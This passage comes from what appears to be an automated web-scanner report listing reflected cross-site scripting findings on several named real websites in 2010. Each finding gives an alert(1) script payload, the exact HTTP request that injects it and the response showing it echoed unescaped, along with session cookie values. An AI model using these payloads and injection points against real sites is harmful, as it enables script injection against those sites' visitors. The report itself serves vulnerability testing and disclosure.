           DownloaderController.Init('DownloaderNotInstalled', false, 'bpd://secure.gamearena.com.au/shop/games/title/secret-diaries-florence-ashford/index.php?61ab5'-alert(1)-'95d0a350b7d=1&PerformBpdDownload=1&hmac=ff8ff75f013345e6e2f1cfa8009a4310a963cbca&ts=1290480938&userid=0', 'gamearena.com.au');        </script>
...[SNIP]...

2.726. http://www.gamearena.com.au/shop/games/title/the-seawise-chronicles-untamed-legacy/index.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamearena.com.au
Path:   /shop/games/title/the-seawise-chronicles-untamed-legacy/index.php

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83b93'-alert(1)-'1cbfd3fd174 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/games/title/the-seawise-chronicles-untamed-legacy/index.php83b93'-alert(1)-'1cbfd3fd174 HTTP/1.1
Host: www.gamearena.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:56:04 GMT
Server: Apache
Set-Cookie: ga_sessionid=GUmrtdl6kTVbsmczpMRpQVFvxZ; expires=Thu, 23-Dec-2010 02:56:04 GMT; path=/; domain=.gamearena.com.au; httponly
Set-Cookie: MMSessID=rtokba0q1ig3u6cv12m30qgoh0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 106619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face
...[SNIP]...
<script language="JavaScript">
           DownloaderController.Init('DownloaderNotInstalled', false, 'bpd://secure.gamearena.com.au/shop/games/title/the-seawise-chronicles-untamed-legacy/index.php83b93'-alert(1)-'1cbfd3fd174?PerformBpdDownload=1&hmac=8b8cf02e6eb18d53469e703f8f55636096110af8&ts=1290480964&userid=0', 'gamearena.com.au');        </script>
...[SNIP]...

2.727. http://www.gamearena.com.au/shop/games/title/the-seawise-chronicles-untamed-legacy/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamearena.com.au
Path:   /shop/games/title/the-seawise-chronicles-untamed-legacy/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7267'-alert(1)-'7c57df84a8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/games/title/the-seawise-chronicles-untamed-legacy/index.php?c7267'-alert(1)-'7c57df84a8c=1 HTTP/1.1
Host: www.gamearena.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:55:36 GMT
Server: Apache
Set-Cookie: ga_sessionid=GUqegng7huFbYPKKyhDaQH4Vky; expires=Thu, 23-Dec-2010 02:55:36 GMT; path=/; domain=.gamearena.com.au; httponly
Set-Cookie: MMSessID=g7rkmul9fndldi5i14nul98do5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 106624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face
...[SNIP]...
anguage="JavaScript">
           DownloaderController.Init('DownloaderNotInstalled', false, 'bpd://secure.gamearena.com.au/shop/games/title/the-seawise-chronicles-untamed-legacy/index.php?PerformBpdDownload=1&c7267'-alert(1)-'7c57df84a8c=1&hmac=f4c6c285b0a579fb0fa8cdfd7203ca959a80faf6&ts=1290480936&userid=0', 'gamearena.com.au');        </script>
...[SNIP]...

2.728. http://www.gamearena.com.au/shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamearena.com.au
Path:   /shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.php

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbf80'-alert(1)-'c1592b9858f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.phpcbf80'-alert(1)-'c1592b9858f HTTP/1.1
Host: www.gamearena.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:56:04 GMT
Server: Apache
Set-Cookie: ga_sessionid=GUu5b1KXipzXyNZheHHxpYGcqW; expires=Thu, 23-Dec-2010 02:56:04 GMT; path=/; domain=.gamearena.com.au; httponly
Set-Cookie: MMSessID=umj0g9dpiidpfkn7ga9ttcemh7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 107152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face
...[SNIP]...
script language="JavaScript">
           DownloaderController.Init('DownloaderNotInstalled', false, 'bpd://secure.gamearena.com.au/shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.phpcbf80'-alert(1)-'c1592b9858f?PerformBpdDownload=1&hmac=5902faa9f49913ae664da5e2d12147899aec0a9e&ts=1290480964&userid=0', 'gamearena.com.au');        </script>
...[SNIP]...

2.729. http://www.gamearena.com.au/shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamearena.com.au
Path:   /shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a8b7'-alert(1)-'15e83935456 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.php?8a8b7'-alert(1)-'15e83935456=1 HTTP/1.1
Host: www.gamearena.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:55:36 GMT
Server: Apache
Set-Cookie: ga_sessionid=GUdynvmnHSphjytPS36WfQVNqS; expires=Thu, 23-Dec-2010 02:55:36 GMT; path=/; domain=.gamearena.com.au; httponly
Set-Cookie: MMSessID=7mm4nrjn2oajm6gugjqpok9kq7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 107157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face
...[SNIP]...
cript language="JavaScript">
           DownloaderController.Init('DownloaderNotInstalled', false, 'bpd://secure.gamearena.com.au/shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.php?8a8b7'-alert(1)-'15e83935456=1&PerformBpdDownload=1&hmac=12b608a962d47c79eb541619862484de482c8b8d&ts=1290480936&userid=0', 'gamearena.com.au');        </script>
...[SNIP]...

2.730. http://www.gamearena.com.au/shop/mobile/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamearena.com.au
Path:   /shop/mobile/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 800b7'><script>alert(1)</script>ca0103945b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/mobile/?800b7'><script>alert(1)</script>ca0103945b1=1 HTTP/1.1
Host: www.gamearena.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:55:29 GMT
Server: Apache
Set-Cookie: ga_sessionid=GUgIrCD8iyFuFmyENnpTSG7LQw; expires=Thu, 23-Dec-2010 02:55:29 GMT; path=/; domain=.gamearena.com.au; httponly
Set-Cookie: MMSessID=78p804833i3do03qpnlsr67fh6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 232590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face
...[SNIP]...
<a class="pageLink" href='/shop/mobile/?800b7'><script>alert(1)</script>ca0103945b1=1&p=2'>
...[SNIP]...

2.731. http://www.gamearena.com.au/shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamearena.com.au
Path:   /shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13046"><script>alert(1)</script>4c16f852011 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php13046"><script>alert(1)</script>4c16f852011 HTTP/1.1
Host: www.gamearena.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:55:38 GMT
Server: Apache
Set-Cookie: ga_sessionid=GUHUVeWeSX87dhFrjzAy3tsPWX; expires=Thu, 23-Dec-2010 02:55:38 GMT; path=/; domain=.gamearena.com.au; httponly
Set-Cookie: MMSessID=bffcm53fhi01h48dt1kolj32o0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 85468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face
...[SNIP]...
<input type="hidden" name="goto_url" value="/shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php13046"><script>alert(1)</script>4c16f852011" />
...[SNIP]...

2.732. http://www.gamearena.com.au/shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamearena.com.au
Path:   /shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16cbc"><script>alert(1)</script>f7c9e714a11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php/16cbc"><script>alert(1)</script>f7c9e714a11 HTTP/1.1
Host: www.gamearena.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:55:29 GMT
Server: Apache
Set-Cookie: ga_sessionid=GU5jScsdRir8TxcL64ERAsTR7C; expires=Thu, 23-Dec-2010 02:55:29 GMT; path=/; domain=.gamearena.com.au; httponly
Set-Cookie: MMSessID=l67c7ucvb6ml3r75dgqq1j2s73; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 85470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face
...[SNIP]...
<input type="hidden" name="goto_url" value="/shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php/16cbc"><script>alert(1)</script>f7c9e714a11" />
...[SNIP]...

2.733. http://www.telstra.net/ops/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.telstra.net
Path:   /ops/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53a36<script>alert(1)</script>6bf5967d185 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ops53a36<script>alert(1)</script>6bf5967d185/ HTTP/1.1
Host: www.telstra.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 02:31:46 GMT
Server: Apache/2.0.49 (Linux/SuSE)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1589


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0081)http://mws-w133894.cdn.telstra.com.au/bigpond/direct/telstra_standards/header.htm -->
<!--Begin global jav
...[SNIP]...
<p class="error">/ops53a36<script>alert(1)</script>6bf5967d185/ does not exist on this server.</p>
...[SNIP]...

2.734. http://www.utest.com/how-it-works/agile-testing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.utest.com
Path:   /how-it-works/agile-testing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b09b"><script>alert(1)</script>33e57d613e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /how-it-works/agile-testing?9b09b"><script>alert(1)</script>33e57d613e4=1 HTTP/1.1
Host: www.utest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; mkeng_id=a418620f4ff42ce9be93ec1a721f6a25b9dc007f; __utmz=220800860.1290483926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=220800860.1578714025.1290483926.1290483926.1290483926.1; __utmc=220800860; __utmb=220800860.5.10.1290483926; SESS3576489563ca528674cbb246a80a52f5=7f95e2f5eb9a0fc691280a1c52d12cc4;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:01:13 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 23 Nov 2010 03:01:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<form action="/how-it-works/agile-testing?9b09b"><script>alert(1)</script>33e57d613e4=1" method="POST" >
...[SNIP]...

2.735. http://www.utest.com/intro [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.utest.com
Path:   /intro

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 180c8"><script>alert(1)</script>0467e4d206 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /intro?180c8"><script>alert(1)</script>0467e4d206=1 HTTP/1.1
Host: www.utest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; mkeng_id=a418620f4ff42ce9be93ec1a721f6a25b9dc007f; __utmz=220800860.1290483926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=220800860.1578714025.1290483926.1290483926.1290483926.1; __utmc=220800860; __utmb=220800860.5.10.1290483926; SESS3576489563ca528674cbb246a80a52f5=7f95e2f5eb9a0fc691280a1c52d12cc4;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:59:19 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 23 Nov 2010 02:59:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<form action="https://www.utest.com/intro?180c8"><script>alert(1)</script>0467e4d206=1" method="POST" >
...[SNIP]...

2.736. http://www.utest.com/meet-testers [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.utest.com
Path:   /meet-testers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64356"><script>alert(1)</script>c5907c3867b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /meet-testers?64356"><script>alert(1)</script>c5907c3867b=1 HTTP/1.1
Host: www.utest.com
Proxy-Connection: keep-alive
Referer: http://www.utest.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS3576489563ca528674cbb246a80a52f5=7f95e2f5eb9a0fc691280a1c52d12cc4; mkeng_id=a418620f4ff42ce9be93ec1a721f6a25b9dc007f; has_js=1; __utmz=220800860.1290483926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=220800860.1578714025.1290483926.1290483926.1290483926.1; __utmc=220800860; __utmb=220800860.1.10.1290483926

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:59:27 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 23 Nov 2010 02:59:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 53091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<form action="https://www.utest.com/meet-testers?64356"><script>alert(1)</script>c5907c3867b=1" method="POST" >
...[SNIP]...

2.737. http://www.utest.com/pricing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.utest.com
Path:   /pricing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4357f"><script>alert(1)</script>9a6adc3ee95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pricing?4357f"><script>alert(1)</script>9a6adc3ee95=1 HTTP/1.1
Host: www.utest.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS3576489563ca528674cbb246a80a52f5=7f95e2f5eb9a0fc691280a1c52d12cc4; mkeng_id=a418620f4ff42ce9be93ec1a721f6a25b9dc007f; __utmz=220800860.1290483926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=220800860.1578714025.1290483926.1290483926.1290483926.1; __utmc=220800860; __utmb=220800860.5.10.1290483926

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:59:29 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 23 Nov 2010 02:59:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 73504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<form action="https://www.utest.com/pricing?4357f"><script>alert(1)</script>9a6adc3ee95=1" method="POST" >
...[SNIP]...

2.738. http://www.utest.com/what-we-test/desktop-application-testing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.utest.com
Path:   /what-we-test/desktop-application-testing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94fae"><script>alert(1)</script>35cdcc305c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /what-we-test/desktop-application-testing?94fae"><script>alert(1)</script>35cdcc305c9=1 HTTP/1.1
Host: www.utest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; mkeng_id=a418620f4ff42ce9be93ec1a721f6a25b9dc007f; __utmz=220800860.1290483926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=220800860.1578714025.1290483926.1290483926.1290483926.1; __utmc=220800860; __utmb=220800860.5.10.1290483926; SESS3576489563ca528674cbb246a80a52f5=7f95e2f5eb9a0fc691280a1c52d12cc4;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:01:32 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 23 Nov 2010 03:01:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 53080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<form action="/what-we-test/desktop-application-testing?94fae"><script>alert(1)</script>35cdcc305c9=1" method="POST" >
...[SNIP]...

2.739. http://www.utest.com/what-we-test/gaming-application-testing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.utest.com
Path:   /what-we-test/gaming-application-testing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18c74"><script>alert(1)</script>0829c5bcbc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /what-we-test/gaming-application-testing?18c74"><script>alert(1)</script>0829c5bcbc3=1 HTTP/1.1
Host: www.utest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; mkeng_id=a418620f4ff42ce9be93ec1a721f6a25b9dc007f; __utmz=220800860.1290483926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=220800860.1578714025.1290483926.1290483926.1290483926.1; __utmc=220800860; __utmb=220800860.5.10.1290483926; SESS3576489563ca528674cbb246a80a52f5=7f95e2f5eb9a0fc691280a1c52d12cc4;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:01:31 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 23 Nov 2010 03:01:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<form action="/what-we-test/gaming-application-testing?18c74"><script>alert(1)</script>0829c5bcbc3=1" method="POST" >
...[SNIP]...

2.740. http://www.virtualmedicalcentre.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtualmedicalcentre.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21bba"><script>alert(1)</script>10e5e8898c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

